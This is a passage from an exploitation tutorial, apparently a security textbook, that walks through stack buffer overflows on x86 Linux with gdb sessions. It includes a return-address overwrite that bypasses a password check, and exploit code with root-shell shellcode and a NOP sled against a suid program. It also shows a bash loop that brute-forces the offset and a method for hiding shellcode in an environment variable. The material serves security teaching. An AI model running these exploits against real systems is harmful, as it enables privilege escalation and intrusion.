0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d

0x080484ec <main+120>: call 0x804831c <printf@plt>

0x080484f1 <main+125>: leave

0x080484f2 <main+126>: ret

End of assembler dump.

(gdb)

Notice the two lines shown in bold on page 131. At this point, the EAX register contains a pointer to the first command-line argument. This is also the argument to check_authentication(). This first assembly instruction writes EAX to where ESP is pointing (the top of the stack). This starts the stack frame for check_authentication() with the function argument. The second instruction is the actual call. This instruction pushes the address of the next instruction to the stack and moves the execution pointer register (EIP) to the start of the check_authentication() function. The address pushed to the stack is the return address for the stack frame. In this case, the address of the next instruction is 0x080484bb, so that is the return address.

(gdb) disass check_authentication

Dump of assembler code for function check_authentication:

0x08048414 <check_authentication+0>: push ebp

0x08048415 <check_authentication+1>: mov ebp,esp

0x08048417 <check_authentication+3>: sub esp,0x38

...

0x08048472 <check_authentication+94>: leave

0x08048473 <check_authentication+95>: ret

End of assembler dump.

(gdb) p 0x38

$3 = 56

(gdb) p 0x38 + 4 + 4

$4 = 64

(gdb)

Execution will continue into the check_authentication() function as EIP is changed, and the first few instructions (shown in bold above) finish saving memory for the stack frame. These instructions are known as the function prologue. The first two instructions are for the saved frame pointer, and the third instruction subtracts 0x38 from ESP. This saves 56 bytes for the local variables of the function. The return address and the saved frame pointer are already pushed to the stack and account for the additional 8 bytes of the 64-byte stack frame.

When the function finishes, the leave and ret instructions remove the stack frame and set the execution pointer register (EIP) to the saved return address in the stack frame (). This brings the program execution back to the next instruction in main() after the function call at 0x080484bb. This process happens every time a function is called in any program.

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) cont

Continuing.

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)

at auth_overflow2.c:16

16 return auth_flag;

(gdb) x/32xw $esp

0xbffff7a0: 0xbffff7c0 0x080485dc 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7d0: 0x41414141 0x41414141 0x41414141 0x08004141

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) cont

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x08004141 in ?? ()

(gdb)

When some of the bytes of the saved return address are overwritten, the program will still try to use that value to restore the execution pointer register (EIP). This usually results in a crash, since execution is essentially jumping to a random location. But this value doesn't need to be random. If the overwrite is controlled, execution can, in turn, be controlled to jump to a specific location. But where should we tell it to go?

Experimenting with BASH

Since so much of hacking is rooted in exploitation and experimentation, the ability to quickly try different things is vital. The BASH shell and Perl are common on most machines and are all that is needed to experiment with exploitation.

Perl is an interpreted programming language with a print command that happens to be particularly suited to generating long sequences of characters. Perl can be used to execute instructions on the command line by using the -eswitch like this:

reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'

AAAAAAAAAAAAAAAAAAAA

This command tells Perl to execute the commands found between the single quotes—in this case, a single command of print "A" x 20;. This command prints the character A 20 times.

Any character, such as a nonprintable character, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41.

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'

AAAAAAAAAAAAAAAAAAAA

In addition, string concatenation can be done in Perl with a period (.). This can be useful when stringing multiple addresses together.

reader@hacking:~/booksrc $ perl -e 'print "A"x20 . "BCD" . "\x61\x66\x67\x69"x2 . "Z";'

AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

An entire shell command can be executed like a function, returning its output in place. This is done by surrounding the command with parentheses and prefixing a dollar sign. Here are two examples:

reader@hacking:~/booksrc $ $(perl -e 'print "uname";')

Linux

reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e

Linux

reader@hacking:~/booksrc $

In each case, the output of the command found between the parentheses is substituted for the command, and the command uname is executed. This exact command-substitution effect can be accomplished with grave accent marks (', the tilted single quote on the tilde key). You can use whichever syntax feels more natural for you; however, the parentheses syntax is easier to read for most people.

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me

Linux

reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me

Linux

reader@hacking:~/booksrc $

Command substitution and Perl can be used in combination to quickly generate overflow buffers on the fly. You can use this technique to easily test the overflow_example.c program with buffers of precise lengths.

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x30')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 30 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'

[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)

Segmentation fault (core dumped)

reader@hacking:~/booksrc $ gdb -q

(gdb) print 0xbffff7f4 - 0xbffff7e0

$1 = 20

(gdb) quit

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 . "ABCD"')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'

[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241)

reader@hacking:~/booksrc $

In the output above, GDB is used as a hexadecimal calculator to figure out the distance between buffer_two (0xbfffff7e0) and the value variable (0xbffff7f4), which turns out to be 20 bytes. Using this distance, the valuevariable is overwritten with the exact value 0x44434241, since the characters A, B, C, and D have the hex values of 0x41, 0x42, 0x43, and 0x44, respectively. The first character is the least significant byte, due to the little-endian architecture. This means if you wanted to control the value variable with something exact, like oxdeadbeef, you must write those bytes into memory in reverse order.

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 .

"\xef\xbe\xad\xde"')

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'

[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)

reader@hacking:~/booksrc $

This technique can be applied to overwrite the return address in the auth_overflow2.c program with an exact value. In the example below, we will overwrite the return address with a different address in main().

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./auth_overflow2

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) disass main

Dump of assembler code for function main:

0x08048474 <main+0>: push ebp

0x08048475 <main+1>: mov ebp,esp

0x08048477 <main+3>: sub esp,0x8

0x0804847a <main+6>: and esp,0xfffffff0

0x0804847d <main+9>: mov eax,0x0

0x08048482 <main+14>: sub esp,eax

0x08048484 <main+16>: cmp DWORD PTR [ebp+8],0x1

0x08048488 <main+20>: jg 0x80484ab <main+55>

0x0804848a <main+22>: mov eax,DWORD PTR [ebp+12]

0x0804848d <main+25>: mov eax,DWORD PTR [eax]

0x0804848f <main+27>: mov DWORD PTR [esp+4],eax

0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5

0x0804849a <main+38>: call 0x804831c <printf@plt>

0x0804849f <main+43>: mov DWORD PTR [esp],0x0

0x080484a6 <main+50>: call 0x804833c <exit@plt>

0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]

0x080484ae <main+58>: add eax,0x4

0x080484b1 <main+61>: mov eax,DWORD PTR [eax]

0x080484b3 <main+63>: mov DWORD PTR [esp],eax

0x080484b6 <main+66>: call 0x8048414 <check_authentication>

0x080484bb <main+71>: test eax,eax

0x080484bd <main+73>: je 0x80484e5 <main+113>

0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb

0x080484c6 <main+82>: call 0x804831c <printf@plt>

0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619

0x080484d2 <main+94>: call 0x804831c <printf@plt>

0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630

0x080484de <main+106>: call 0x804831c <printf@plt>

0x080484e3 <main+111>: jmp 0x80484f1 <main+125>

0x080484e5 <main+113>: mov DWORD PTR [esp],0x804864d

0x080484ec <main+120>: call 0x804831c <printf@plt>

0x080484f1 <main+125>: leave

0x080484f2 <main+126>: ret

End of assembler dump.

(gdb)

This section of code shown in bold contains the instructions that display the Access Granted message. The beginning of this section is at 0x080484bf, so if the return address is overwritten with this value, this block of instructions will be executed. The exact distance between the return address and the start of the password_buffer can change due to different compiler versions and different optimization flags. As long as the start of the buffer is aligned with DWORDs on the stack, this mutability can be accounted for by simply repeating the return address many times. This way, at least one of the instances will overwrite the return address, even if it has shifted around due to compiler optimizations.

reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Segmentation fault (core dumped)

reader@hacking:~/booksrc $

In the example above, the target address of 0x080484bf is repeated 10 times to ensure the return address is overwritten with the new target address. When the check_authentication() function returns, execution jumps directly to the new target address instead of returning to the next instruction after the call. This gives us more control; however, we are still limited to using instructions that exist in the original programming.

The notesearch program is vulnerable to a buffer overflow on the line marked in bold here.

int main(int argc, char *argv[]) {

int userid, printing=1, fd; // File descriptor

char searchstring[100];

if(argc > 1) // If there is an arg

strcpy(searchstring, argv[1]); // that is the search string;

else // otherwise,

searchstring[0] = 0; // search string is empty.

The notesearch exploit uses a similar technique to overflow a buffer into the return address; however, it also injects its own instructions into memory and then returns execution there. These instructions are called shellcode, and they tell the program to restore privileges and open a shell prompt. This is especially devastating for the notesearch program, since it is suid root. Since this program expects multiuser access, it runs under higher privileges so it can access its data file, but the program logic prevents the user from using these higher privileges for anything other than accessing the data file—at least that's the intention.

But when new instructions can be injected in and execution can be controlled with a buffer overflow, the program logic is meaningless. This technique allows the program to do things it was never programmed to do, while it's still running with elevated privileges. This is the dangerous combination that allows the notesearch exploit to gain a root shell. Let's examine the exploit further.

reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4 char shellcode[]=

5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

7 "\xe1\xcd\x80";

8

9 int main(int argc, char *argv[]) {

10 unsigned int i, *ptr, ret, offset=270;

(gdb)

11 char *command, *buffer;

12

13 command = (char *) malloc(200);

14 bzero(command, 200); // Zero out the new memory.

15

16 strcpy(command, "./notesearch \'"); // Start command buffer.

17 buffer = command + strlen(command); // Set buffer at the end.

18

19 if(argc > 1) // Set offset.

20 offset = a toi(argv[1]);

(gdb)

21

22 ret = (unsigned int) &i - offset; // Set return address.

23

24 for(i=0; i < 160; i+=4) // Fill buffer with return address.

25 *((unsigned int *)(buffer+i)) = ret;

26 memset(buffer, 0x90, 60); // Build NOP sled.

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

28

29 strcat(command, "\'");

30

(gdb) break 26

Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.

(gdb) break 27

Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.

(gdb) break 28

Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.

(gdb)

The notesearch exploit generates a buffer in lines 24 through 27 (shown above in bold). The first part is a for loop that fills the buffer with a 4-byte address stored in the ret variable. The loop increments i by 4 each time. This value is added to the buffer address, and the whole thing is typecast as a unsigned integer pointer. This has a size of 4, so when the whole thing is dereferenced, the entire 4-byte value found in ret is written.

(gdb) run

Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26

26 memset(buffer, 0x90, 60); // build NOP sled

(gdb) x/40x buffer

0x804a016: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a026: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a036: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a046: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch

'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û

ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

At the first breakpoint, the buffer pointer shows the result of the for loop. You can also see the relationship between the command pointer and the buffer pointer. The next instruction is a call to memset(), which starts at the beginning of the buffer and sets 60 bytes of memory with the value 0x90.

(gdb) cont

Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

(gdb) x/40x buffer

0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a046: 0x90909090 0x90909090 0x90909090 0xbffff6f6

0x804a056: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a066: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch '", '\220' <repeats 60 times>, "¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿

¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

Finally, the call to memcpy() will copy the shellcode bytes into buffer+60.

(gdb) cont

Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:29

29 strcat(command, "\'");

(gdb) x/40x buffer

0x804a016: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a026: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a036: 0x90909090 0x90909090 0x90909090 0x90909090

0x804a046: 0x90909090 0x90909090 0x90909090 0x3158466a

0x804a056: 0xcdc931db 0x2f685180 0x6868732f 0x6e69622f

0x804a066: 0x5351e389 0xb099e189 0xbf80cd0b 0xbffff6f6

0x804a076: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a086: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a096: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

0x804a0a6: 0xbffff6f6 0xbffff6f6 0xbffff6f6 0xbffff6f6

(gdb) x/s command

0x804a008: "./notesearch '", '\220' <repeats 60 times>, "1À1Û1É\231°gÍ\200j\vXQh//shh/

bin\211ãQ\211âS\211áÍ\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"

(gdb)

Now the buffer contains the desired shellcode and is long enough to overwrite the return address. The difficulty of finding the exact location of the return address is eased by using the repeated return address technique. But this return address must point to the shellcode located in the same buffer. This means the actual address must be known ahead of time, before it even goes into memory. This can be a difficult prediction to try to make with a dynamically changing stack. Fortunately, there is another hacking technique, called the NOP sled, that can assist with this difficult chicanery. NOP is an assembly instruction that is short for no operation. It is a single-byte instruction that does absolutely nothing. These instructions are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture, due to instruction pipelining. In this case, NOP instructions are going to be used for a different purpose: as a fudge factor. We'll create a large array (or sled) of these NOP instructions and place it before the shellcode; then, if the EIP register points to any address found in the NOP sled, it will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP register will slide down the sled to the shellcode, which will execute properly. On the x86 architecture, the NOP instruction is equivalent to the hex byte 0x90. This means our completed exploit buffer looks something like this:

Figure 0x300-2.

Even with a NOP sled, the approximate location of the buffer in memory must be predicted in advance. One technique for approximating the memory location is to use a nearby stack location as a frame of reference. By subtracting an offset from this location, the relative address of any variable can be obtained.

Experimenting with BASH

From exploit_notesearch.c

unsigned int i, *ptr, ret, offset=270;

char *command, *buffer;

command = (char *) malloc(200);

bzero(command, 200); // Zero out the new memory.

strcpy(command, "./notesearch \'"); // Start command buffer.

buffer = command + strlen(command); // Set buffer at the end.

if(argc > 1) // Set offset.

offset = atoi(argv[1]);

ret = (unsigned int) &i - offset; // Set return address.

In the notesearch exploit, the address of the variable i in main()'s stack frame is used as a point of reference. Then an offset is subtracted from that value; the result is the target return address. This offset was previously determined to be 270, but how is this number calculated?

The easiest way to determine this offset is experimentally. The debugger will shift memory around slightly and will drop privileges when the suid root notesearch program is executed, making debugging much less useful in this case.

Since the notesearch exploit allows an optional command-line argument to define the offset, different offsets can quickly be tested.

reader@hacking:~/booksrc $ gcc exploit_notesearch.c

reader@hacking:~/booksrc $ ./a.out 100

-------[ end of note data ]-------

reader@hacking:~/booksrc $ ./a.out 200

-------[ end of note data ]-------

reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid. BASH also has a for loop that can be used to automate this process. The seq command is a simple program that generates sequences of numbers, which is typically used with looping.

reader@hacking:~/booksrc $ seq 1 10

1

2

3

4

5

6

7

8

9

10

reader@hacking:~/booksrc $ seq 1 3 10

1

4

7

10

reader@hacking:~/booksrc $

When only two arguments are used, all the numbers from the first argument to the second are generated. When three arguments are used, the middle argument dictates how much to increment each time. This can be used with command substitution to drive BASH's for loop.

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)

> do

> echo The value is $i

> done

The value is 1

The value is 4

The value is 7

The value is 10

reader@hacking:~/booksrc $

The function of the for loop should be familiar, even if the syntax is a little different. The shell variable $i iterates through all the values found in the grave accents (generated by seq). Then everything between the do and donekeywords is executed. This can be used to quickly test many different offsets. Since the NOP sled is 60 bytes long, and we can return anywhere on the sled, there is about 60 bytes of wiggle room. We can safely increment the offset loop with a step of 30 with no danger of missing the sled.

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)

> do

> echo Trying offset $i

> ./a.out $i

> done

Trying offset 0

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a value that points somewhere on the NOP sled. When execution tries to return to that location, it will just slide down the NOP sled into the injected shellcode instructions. This is how the default offset value was discovered.

Using the Environment

Sometimes a buffer will be too small to hold even shellcode. Fortunately, there are other locations in memory where shellcode can be stashed. Environment variables are used by the user shell for a variety of things, but what they are used for isn't as important as the fact they are located on the stack and can be set from the shell. The example below sets an environment variable called MYVAR to the string test. This environment variable can be accessed by prepending a dollar sign to its name. In addition, the env command will show all the environment variables. Notice there are several default environment variables already set.

reader@hacking:~/booksrc $ export MYVAR=test

reader@hacking:~/booksrc $ echo $MYVAR

test

reader@hacking:~/booksrc $ env

SSH_AGENT_PID=7531

SHELL=/bin/bash

DESKTOP_STARTUP_ID=

TERM=xterm

GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2

WINDOWID=39845969

OLDPWD=/home/reader

USER=reader

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;

01:or=4

0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:

*.arj=01;

31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:

*.deb=01;31:*

.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:

*.pgm=01;35

:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:

*.mov=01;

35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:

*.xwd=01;

35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:

SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent.7489

GNOME_KEYRING_SOCKET=/tmp/keyring-AyzuEi/socket

SESSION_MANAGER=local/hacking:/tmp/.ICE-unix/7489

USERNAME=reader

DESKTOP_SESSION=default.desktop

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

GDM_XSERVER_LOCATION=local

PWD=/home/reader/booksrc

LANG=en_US.UTF-8

GDMSESSION=default.desktop

HISTCONTROL=ignoreboth

HOME=/home/reader

SHLVL=1

GNOME_DESKTOP_SESSION_ID=Default

LOGNAME=reader

DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-

DxW6W1OH1O,guid=4f4e0e9cc6f68009a059740046e28e35

LESSOPEN=| /usr/bin/lesspipe %s

DISPLAY=:0.0

MYVAR=test

LESSCLOSE=/usr/bin/lesspipe %s %s

RUNNING_UNDER_GDM=yes

COLORTERM=gnome-terminal

XAUTHORITY=/home/reader/.Xauthority

_=/usr/bin/env

reader@hacking:~/booksrc $

Similarly, the shellcode can be put in an environment variable, but first it needs to be in a form we can easily manipulate. The shellcode from the notesearch exploit can be used; we just need to put it into a file in binary form. The standard shell tools of head, grep, and cut can be used to isolate just the hex-expanded bytes of the shellcode.

reader@hacking:~/booksrc $ head exploit_notesearch.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

unsigned int i, *ptr, ret, offset=270;

reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\""

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\"" | cut -d\" -f2

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68

\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89

\xe1\xcd\x80

reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the lines that begin with a quotation mark. This isolates the lines containing the shellcode, which are then piped into cut using options to display only the bytes between two quotation marks.

BASH's for loop can actually be used to send each of these lines to an echo command, with command-line options to recognize hex expansion and to suppress adding a newline character to the end.

reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\"

-f2)

> do

> echo -en $i

> done > shellcode.bin

reader@hacking:~/booksrc $ hexdump -C shellcode.bin

00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|

00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|

00000020 e1 cd 80 |...|

00000023

reader@hacking:~/booksrc $

Now we have the shellcode in a file called shellcode.bin. This can be used with command substitution to put shellcode into an environment variable, along with a generous NOP sled.

reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat

shellcode.bin)

reader@hacking:~/booksrc $ echo $SHELLCODE

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j

XQh//shh/bin␣␣Q␣␣S␣␣

reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment variable, along with a 200-byte NOP sled. This means we just need to find an address somewhere in that range of the sled to overwrite the saved return address with. The environment variables are located near the bottom of the stack, so this is where we should look when running notesearch in a debugger.

reader@hacking:~/booksrc $ gdb -q ./notesearch

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) break main

Breakpoint 1 at 0x804873c

(gdb) run

Starting program: /home/reader/booksrc/notesearch

Breakpoint 1, 0x0804873c in main ()

(gdb)

A breakpoint is set at the beginning of main(), and the program is run. This will set up memory for the program, but it will stop before anything happens. Now we can examine memory down near the bottom of the stack.

(gdb) i r esp

esp 0xbffff660 0xbffff660

(gdb) x/24s $esp + 0x240

0xbffff8a0: ""

0xbffff8a1: ""

0xbffff8a2: ""

0xbffff8a3: ""

0xbffff8a4: ""

0xbffff8a5: ""

0xbffff8a6: ""

0xbffff8a7: ""

0xbffff8a8: ""

0xbffff8a9: ""

0xbffff8aa: ""

0xbffff8ab: "i686"

0xbffff8b0: "/home/reader/booksrc/notesearch"

0xbffff8d0: "SSH_AGENT_PID=7531"

0xbffffd56: "SHELLCODE=", '\220' <repeats 190 times>...

0xbffff9ab: "\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//

shh/bin\211�Q\211�S\211��\200"

0xbffff9d9: "TERM=xterm"

0xbffff9e4: "DESKTOP_STARTUP_ID="

0xbffff9f8: "SHELL=/bin/bash"

0xbffffa08: "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"

0xbffffa43: "WINDOWID=39845969"

0xbffffa55: "USER=reader"

0xbffffa61:

"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;

33;01:or=

40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:

*.arj=01

;31:*.taz=0"...

0xbffffb29:

